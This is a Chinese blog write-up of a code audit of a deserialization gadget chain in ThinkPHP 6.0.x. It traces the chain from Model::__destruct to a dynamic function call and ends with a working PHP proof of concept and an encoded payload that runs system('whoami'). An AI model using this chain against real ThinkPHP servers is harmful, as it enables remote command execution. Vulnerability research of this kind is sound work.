<!DOCTYPE html>
<html lang="">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <meta name="google-site-verification" content="fVesNdKs5rVgSDBf0Af0gVcCtxUVEriFBGLGBH2GH8s">
  <link rel="apple-touch-icon" sizes="76x76" href="https://s2.ax1x.com/2019/10/30/K5JmBF.png">
  <link rel="icon" type="image/png" href="https://s2.ax1x.com/2019/10/30/K5JenU.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="Lethe&#39;s Blog">
  <meta name="author" content="Lethe">
  <meta name="keywords" content="Lethe&#39;s Blog">
  <title>ThinkPHP v6.0.x 反序列化 ~ Lethe&#39;s Blog</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.10.2/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.8.9/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>Lethe's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">ホーム</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">アーカイブ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">カテゴリー</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">タグ</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">本ブログ情報　</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background"
         style="background: url('https://s2.ax1x.com/2020/03/11/8k84bQ.jpg')no-repeat center center;
           background-size: cover;
           background-attachment: fixed;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              <br>
              
                <p class="mt-3">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>&nbsp;
                  Sunday, April 26th 2020, 10:03 pm
                </p>
              

              <p>
                
                  
                  &nbsp;<i class="far fa-chart-bar"></i>
                  <span class="post-count">
                    1.7k 字
                  </span>&nbsp;
                

                
                  
                  &nbsp;<i class="far fa-clock"></i>
                  <span class="post-count">
                      7 分钟
                  </span>&nbsp;
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  &nbsp;<i class="far fa-eye" aria-hidden="true"></i>&nbsp;
                  <span id="busuanzi_container_page_pv">
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>&nbsp;
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="py-5 z-depth-3" id="board">
        <div class="post-content mx-auto" id="post">
          <div class="markdown-body">
            <h3><span id="0x01-环境搭建">0x01 环境搭建</span></h3><p>使用composer进行安装：</p>
<pre><code class="bash">composer create-project topthink/think=6.0.x-dev TPv6.0
cd TPv6.0
php think run
</code></pre>
<p>定义入口文件<code>app\controller\Index.php</code>：</p>
<pre><code class="php">&lt;?php
namespace app\controller;

use app\BaseController;

class Index extends BaseController
{
    public function index($payload=&#39;&#39;)
    {   
        //echo $payload;
        unserialize($payload);   
    }
}
</code></pre>
<p><br></p>
<h3><span id="0x02-__destruct链分析">0x02 __destruct链分析</span></h3><h5><span id="1寻找__destruct">（1）寻找__destruct()</span></h5><p>反序列化POP链的起点通常是<code>__destruct()</code>函数，这次漏洞的触发点位于<code>vendor\topthink\think-orm\src\Model.php</code>中<code>Model</code>类的<code>__destruct</code>析构函数：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426224817839.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>当满足<code>$this-&gt;lazySave==true</code>时，将会调用<code>$this-&gt;save()</code>，继续跟进。</p>
<h5><span id="2跟进save">（2）跟进save()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426225403642.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>首先要想不被return掉，需要满足下面整个if语句：</p>
<pre><code class="php">if ($this-&gt;isEmpty() || false === $this-&gt;trigger(&#39;BeforeWrite&#39;)) {
    return false;
}
</code></pre>
<ul>
<li>先跟进<code>$this-&gt;isEmpty()</code>：只需要满足<code>$this-&gt;data</code>不为空即可。<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426225637780.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></li>
<li>再跟进<code>$this-&gt;trigger()</code>：只需要满足<code>$this-&gt;withEvent == false</code>即可返回true。<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426225808813.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>在通过if语句之后，会进入到：<pre><code class="php">$result = $this-&gt;exists ? $this-&gt;updateData() : $this-&gt;insertData($sequence);
</code></pre>
当<code>$this-&gt;exists == true</code>时进入<code>$this-&gt;updateData()</code>；当<code>$this-&gt;exists == false</code>时进入<code>$this-&gt;insertData()</code>。</li>
</ul>
<p>分别跟进，发现<code>updateData()</code>存在继续利用的点，所以需要<code>$this-&gt;exists == true</code>，跟进分析。</p>
<h5><span id="3跟进updatedata">（3）跟进updateData()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426230406966.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>这里下一步的利用点存在于<code>$this-&gt;checkAllowFields()</code>中，但是要调用该函数，需要通过①②两处的if语句：<br>① 与之前<code>save()</code>中的一样，只需要令<code>$this-&gt;withEvent == false</code>即可通过。<br>② 需要<code>$data == 1</code>，所以我们跟进<code>$this-&gt;getChangedData()</code>看一下：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426230826525.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>只需要令<code>$this-&gt;force == true</code>，即可直接返回<code>$this-data</code>，而我们之前也需要设置<code>$this-data</code>为非空。</p>
<p>回到<code>updateData()</code>中，之后就可以成功调用到了<code>$this-&gt;checkAllowFields()</code>。</p>
<h5><span id="4跟进checkallowfields">（4）跟进checkAllowFields()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200426231541891.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>下一步的利用点在<code>$this-&gt;db()</code>中，所以我们需要令<code>$this-&gt;field</code>和<code>$this-&gt;schema</code>均为空才能调用到它：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427000021178.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>但可以看到这两个地方默认为空，所以不需要进行构造，然后进一步跟进<code>$this-&gt;db()</code>。</p>
<h5><span id="5跟进db">（5）跟进db()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427024434222.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p>可以看到这里已经存在了用<code>.</code>进行字符串连接的操作了， 所以把<code>$this-&gt;table</code>或 <code>$this-&gt;suffix</code> 设置成响应类对象就可以触发<code>__toString()</code>了。</p>
<h5><span id="6__destruct链小结">（6）__destruct()链小结</span></h5><p>目前为止，前半条POP链已经完成，即可以通过字符串拼接去调用<code>__toString()</code>，所以先总结一下我们需要设置的点：</p>
<pre><code>$this-&gt;data不为空
$this-&gt;lazySave == true
$this-&gt;withEvent == false
$this-&gt;exists == true
$this-&gt;force == true
</code></pre><p>调用过程如下：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427000737813.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>但是还有一个问题就是<code>Model</code>类是抽象类，不能实例化。所以要想利用，得找出<code>Model</code>类的一个子类进行实例化，这里可以用<code>Pivot</code>类进行利用。<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427001136558.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><br></p>
<h3><span id="0x03-__tostring链分析">0x03 __toString()链分析</span></h3><h5><span id="1寻找__tostring">（1）寻找__toString()</span></h5><p>既然前半条POP链已经能够触发<code>__toString()</code>，下面就是寻找利用点。这次漏洞的<code>__toString()</code>利用点位于<code>vendor\topthink\think-orm\src\model\concern\Conversion.php</code>中名为<code>Conversion</code> 的trait中。<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427001835137.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>很简单，跟进<code>toJson()</code>。</p>
<h5><span id="2跟进tojson">（2）跟进toJson()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427001928575.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>没什么好说的，继续跟进<code>toArray()</code>。</p>
<h5><span id="3跟进toarray">（3）跟进toArray()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427024722192.png" srcset="/img/loading.gif" alt="在这里插入图片描述"></p>
<p>对<code>$date</code>进行遍历，其中<code>$key</code>为<code>$date</code>的键。默认情况下，会进入第二个<code>elseif</code>语句，从而已<code>$key</code>作为参数调用<code>getAttr()</code>函数。</p>
<p>接着跟进<code>getAttr()</code>。</p>
<h5><span id="4跟进getattr">（4）跟进getAttr()</span></h5><p>位于<code>vendor\topthink\think-orm\src\model\concern\Attribute.php</code>中：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427003057642.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><code>$value</code>返回自<code>$this-&gt;getData()</code>，且参数为<code>toArray()</code>传进来的<code>$key</code>，跟进一下<code>getData()</code>：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427003348492.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>继续跟进<code>getRealFieldName()</code>：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427003513930.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>当满足<code>$this-&gt;strict == true</code>时（默认为true），直接返回<code>$name</code>，也就是最开始从<code>toArray()</code>中传进来的<code>$key</code>值。</p>
<p>从<code>getRealFieldName()</code>回到<code>getData()</code>，此时<code>$fieldName</code>即为<code>$key</code>。而返回语句如下，实际上就是返回了<code>$this-&gt;data[$key]</code>。<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427003758867.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>然后再从<code>getData()</code>回到<code>getAttr()</code>，最后的返回语句如下：</p>
<pre><code class="php">return $this-&gt;getValue($name, $value, $relation);
</code></pre>
<p>这时参数<code>$name</code>则是从<code>toArray()</code>传进来的<code>$key</code>，而参数<code>$value</code>的值就是<code>$this-&gt;data[$key]</code>。</p>
<p>继续跟进一下<code>getValue()</code></p>
<h5><span id="5跟进getvalue">（5）跟进getValue()</span></h5><p><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427005512411.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>首先<code>$fieldName</code>的值来自经过<code>getRealFieldName()</code>处理的<code>$key</code>值，而当<code>$this-&gt;strict == true</code>时，是不做处理直接返回的，所以<code>$fieldName</code>的值就为<code>$key</code>。</p>
<p>跟进一下<code>getRealFieldName()</code>：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427004921811.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br>然后需要通过两个if语句，满足的条件为：<code>$this-&gt;withAttr</code>数组存在和<code>$date</code>一样的键<code>$key</code>，并且这个键对应的值不能为数组。</p>
<p>这样的话，就会把<code>$this-&gt;withAttr[$key]</code>（<code>withAttr</code>数组<code>$key</code>键对应的值）当做函数名动态执行，参数为<code>$this-&gt;date[$key]</code>。</p>
<p>例如：</p>
<pre><code class="php">$this-&gt;withAttr = [&quot;key&quot; =&gt; &quot;system&quot;];
$this-&gt;data = [&quot;key&quot; =&gt; &quot;whoami&quot;]; 
</code></pre>
<p>实际上最后执行的即为<code>system(&#39;whoami&#39;)</code></p>
<h5><span id="6__tostring链小结">（6）__toString()链小结</span></h5><p>至此，后半个POP链也构造完成，小结一下需要构造的点：</p>
<pre><code>trait Attribute
{
    private $data = [&quot;axin&quot; =&gt; &quot;dir&quot;];
    private $withAttr = [&quot;axin&quot; =&gt; &quot;system&quot;];
}
</code></pre><p>除此之外还需要将前面说的<code>table</code>声明为Pivot类对象，从而将两个POP链串联起来。</p>
<p>第二个POP链调用过程如下：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427030303975.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><br></p>
<h3><span id="0x04-poc">0x04 POC</span></h3><p>最终POC如下：</p>
<pre><code class="php">&lt;?php

namespace think\model\concern;

trait Attribute
{
    private $data = [&quot;axin&quot; =&gt; &quot;whoami&quot;];
    private $withAttr = [&quot;axin&quot; =&gt; &quot;system&quot;];
}

namespace think;

abstract class Model
{
    use model\concern\Attribute;
    private $lazySave;
    protected $withEvent;
    private $exists;
    private $force;
    protected $table;
    function __construct($obj = &#39;&#39;)
    {
        $this-&gt;lazySave = true;
        $this-&gt;withEvent = false;
        $this-&gt;exists = true;
        $this-&gt;force = true;
        $this-&gt;table = $obj;
    }
}

namespace think\model;

use think\Model;

class Pivot extends Model
{
}
$a = new Pivot();
$b = new Pivot($a);

echo urlencode(serialize($b));
</code></pre>
<p>运行得到payload:</p>
<pre><code>O%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A7%3A%7Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A8%3A%22%00%2A%00table%22%3Bs%3A0%3A%22%22%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22axin%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22axin%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A4%3A%22axin%22%3Bs%3A6%3A%22whoami%22%3B%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A4%3A%22axin%22%3Bs%3A6%3A%22system%22%3B%7D%7D
</code></pre><p>结果如下：<br><img src="/2020/04/26/ThinkPHPv6-0-unserialize/20200427030648728.png" srcset="/img/loading.gif" alt="在这里插入图片描述"><br><br></p>
<h3><span id="0x05-后记">0x05 后记</span></h3><p>第一次对ThinkPHP框架进行真实漏洞的审计，参考着大佬们的分析文章才弄明白了。其实一步一步理解这个反序列化漏洞的流程并不是特别困难，主要还是自己对ThinkPHP框架不熟悉、对PHP命名空间的概念也不是特别清晰，导致在编写POC的过程中遇到了些问题。之前一直处于只做CTF题目的状态，以后还是得要多做做代码审计，找个时间把thinkphp手册过一遍吧，tcl。</p>

            <hr>
          </div>
          <br>
          <div>
            <p>
            
              <span>
                <i class="iconfont icon-inbox"></i>
                
                  <a class="hover-with-bg" href="/categories/Code%20Audit">Code Audit</a>
                  &nbsp;
                
              </span>&nbsp;&nbsp;
            
            
              <span>
                <i class="iconfont icon-tag"></i>
                
                  <a class="hover-with-bg" href="/tags/Code%20Audit">Code Audit</a>
                
              </span>
            
            </p>
            
              <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
            
          </div>
        </div>
      </div>
    </div>
    <div class="d-none d-lg-block col-lg-2 toc-container">
      
  <div id="toc">
    <p class="h4"><i class="far fa-list-alt"></i>&nbsp;ディレクトリ</p>
    <div id="tocbot"></div>
  </div>

    </div>
  </div>
</div>

<!-- custom -->


<!-- Comments -->
<div class="col-lg-7 mx-auto nopadding-md">
  <div class="container comments mx-auto" id="comments">
    
      <br><br>
      
      
  <div class="disqus" style="width:100%">
    <div id="disqus_thread"></div>
    <script>
      var disqus_config = function () {
        this.page.url = 'https://lethe.site/2020/04/26/ThinkPHPv6-0-unserialize/';
        this.page.identifier = '/2020/04/26/ThinkPHPv6-0-unserialize/';
      };
      var oldLoad = window.onload;
      window.onload = function () {
        var d = document, s = d.createElement('script');
        s.type = 'text/javascript';
        s.src = '//' + 'Lethe' + '.disqus.com/embed.js';
        s.setAttribute('data-timestamp', +new Date());
        (d.head || d.body).appendChild(s);
      };
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow noopener">comments
        powered by Disqus.</a></noscript>
  </div>


    
  </div>
</div>

    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">検索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">キーワード</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  <footer class="mt-5">
  <div class="text-center py-3">
    <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
    <i class="iconfont icon-love"></i>
    <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    <br>

    
  
    <!-- 不蒜子统计PV -->
    
    &nbsp;<span id="busuanzi_container_site_pv">总访问量 
          <span id="busuanzi_value_site_pv"></span> 次</span>&nbsp;
  
  
    <!-- 不蒜子统计UV -->
    
    &nbsp;<span id="busuanzi_container_site_uv">总访客数 
            <span id="busuanzi_value_site_uv"></span> 人</span>&nbsp;
  
  <br>



    


    <!-- cnzz Analytics icon -->
    

  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.15.0/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.3.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.8.9/js/mdb.min.js"></script>
<script src="/js/main.js"></script>
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https'){
   bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else{
  bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>

  <script src="/js/lazyload.js"></script>



  
    <script src="https://cdn.staticfile.org/tocbot/4.8.0/tocbot.min.js"></script>
  
  <script src="/js/post.js"></script>



  <script src="https://cdn.staticfile.org/smooth-scroll/16.1.0/smooth-scroll.min.js"></script>



  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>


<!-- Plugins -->


  
    <!-- Baidu Analytics -->
    <script>
      var _hmt = _hmt || [];
      (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?99792b18d5c4379d7bc5cf4bced8a563";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
      })();
    </script>
  

  

  

  

  <!-- cnzz Analytics -->
  



  <script src="https://cdn.staticfile.org/prettify/r298/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  ');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.10/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "ThinkPHP v6.0.x 反序列化&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.0/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "false",
      
      icon: "§"
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
        $(element).attr("data-fancybox", "images");
        $(element).attr("href", $(this).attr("src"));
        $(this).wrap(element);
      }
    );
  </script>











</body>
</html>
